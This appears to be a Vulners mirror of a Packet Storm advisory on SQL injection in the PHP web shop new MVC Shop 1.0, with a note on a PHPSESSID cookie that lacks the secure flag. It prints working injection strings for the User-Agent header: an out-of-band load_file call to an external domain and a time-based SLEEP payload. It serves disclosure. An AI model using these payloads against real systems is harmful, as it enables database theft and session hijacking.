Lucene search
K

New MVC Shop 1.0 SQL Injection / Missing Attributes

🗓️ 29 May 2023 00:00:00Reported by nu11secur1tyType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 269 Views

SQL Injection vulnerability in new MVC Shop 1.0, also missing SameSite attribute for PHPSESSI

Code
`## Title: new-mvc-shop-1.0 - SQLi + SameSite attribute weak security  
PHPSESSID Hijacking  
## Author: nu11secur1ty  
## Date: 05.29.2023  
## Vendor: https://chikoiquan.tanhongit.com/  
## Software: https://github.com/tanhongit/new-mvc-shop/releases/tag/v1.0  
## Reference: https://portswigger.net/web-security/sql-injection  
  
## Description:  
The `User-Agent` HTTP header appears to be vulnerable to SQL injection  
attacks. The payload '+(select  
load_file('\\\\ttq1xmuilflmnv0pcl7cjdwb42avymmdp1koacz.pedal.com\\iqp'))+'  
was submitted in the User-Agent HTTP header. This payload injects a  
SQL sub-query that calls MySQL's load_file function with a UNC file  
path that references a URL on an external domain. The application  
interacted with that domain, indicating that the injected SQL query  
was executed. The attacker can retrieve all information from the  
database of this system.  
---------------------------------------------------------------------------------------------------------------  
The following cookie was issued by the application and does not have  
the secure flag set:  
PHPSESSID: The cookie appears to contain a session token, which may  
increase the risk associated with this issue.  
The malicious user can use one PHPSESSID to connect multiple times on  
the system using the same account session.  
  
STATUS: HIGH Vulnerability  
  
[+]Payload:  
```mysql  
---  
Parameter: User-Agent (User-Agent)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8)  
Gecko/20050517 Firefox/1.0.4 (Debian package 1.0.4-2)' AND (SELECT  
2825 FROM (SELECT(SLEEP(15)))VKYP)-- kuoe  
---  
  
```  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/tanhongit/2023/new-mvc-shop-1.0)  
  
## Proof and Exploit:  
[href](https://www.nu11secur1ty.com/2023/05/new-mvc-shop-10-sqli-samesite-attribute.html)  
  
## Time spend:  
00:35:00  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation